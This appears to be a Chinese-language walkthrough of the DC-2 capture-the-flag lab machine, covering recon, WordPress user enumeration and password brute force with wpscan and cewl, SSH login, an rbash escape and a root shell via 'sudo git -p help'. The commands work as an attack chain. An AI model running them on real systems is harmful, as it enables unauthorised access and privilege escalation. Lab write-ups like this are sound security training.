DC2靶机渗透测试

文章目录

目标:收集 5 个 flag

一、信息收集

1.主机发现

已知靶机与攻击机在同一网段,扫描同网段

arp-scan -l

DC2靶机渗透测试

发现靶机 ip

2.端口扫描

nmap -A -p- 192.168.43.105 # -A 全面扫描 # -p- 扫描全面端口

DC2靶机渗透测试

发现开放了 80 端口,Apache 服务
开放了 7744 端口 ssh 服务

二、漏洞挖掘

1.访问靶机 80 端口,查看其使用了什么 cms

DC2靶机渗透测试

发现 wordpress 框架,及 flag 1

若是跳转到 http://dc-2 域名然后无法访问,将 ip 地址、域名 添加到 /etc/hosts 文件
hosts : 定义IP地址和主机名的映射关系,是一个映射IP地址和主机名的规定。 将一些常用的网址域名对应的 IP 地址记录,加快域名解析、屏蔽网站等
DC2靶机渗透测试

flag1
DC2靶机渗透测试

你通常的单词列表可能不起作用,所以,也许你只需要 cewl。 
更多的密码永远是更好的,但有时你就是不能赢得他们的全部。
 以一个身份登录以查看下一个标志。 如果你找不到,就以另一个人的身份登录。

根据提示,可能需要使用 cewl ,以及用户切换操作

2.目录扫描

nikto -h 192.168.1.110

DC2靶机渗透测试

发现登陆页面

3.扫描用户名

wpscan --url dc-2 -e u

DC2靶机渗透测试

4.生成字典

cewl dc-2 -w dict.txt

DC2靶机渗透测试

5.爆破密码

wpscan --url dc-2 -P 1.txt

DC2靶机渗透测试

6.使用账号密码登陆,在登陆 Jerry 时发现 flag2

DC2靶机渗透测试

如果你不能利用WordPress和走捷径,还有另外一种方法。希望你找到了另一个入口。

7.使用 ssh

根据端口扫描,发现开启了ssh服务,我们先尝试连接:

1.使用 jerry 登陆,失败,得知该 ssh 密码与 wordpress 密码不一致

DC2靶机渗透测试

2.使用 tom 登陆,成功

DC2靶机渗透测试

使用 ls 查看文件,发现 flag3 ,使用 cat 打印却提示 -rbash 权限限制
DC2靶机渗透测试

尝试使用 vim、vi,发现 vi 成功进入编辑界面,
DC2靶机渗透测试

可怜的老汤姆总是追着杰里,也许他应该克服他所造成的压力。

提示切换用户,可恶,谜语人

8.rbash绕过

使用 su jerry 发现 su 被 rbash,使用以下方法绕过 rbash

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

切换用户,jerry/adipiscing
切换到 /home/jerry 目录,发现 flag 4

DC2靶机渗透测试

DC2靶机渗透测试

很高兴看到你走了这么远,但你还没回家。 你仍然需要得到最后的旗子(唯一真正重要的标志!)。 这里没有提示-你现在只能靠自己了。 快-快离开这里!
虽然还舞舞轩轩,但是还是提示了 Git 提权

9.git 提权

sudo git -p help 
!/bin/sh

查找最后的 flag,在 /root/ 目录下 发现 final-flag.txt

DC2靶机渗透测试
DC2靶机渗透测试

上一篇:rbash绕过


下一篇:P1036 选数(DFS+不降原则去重)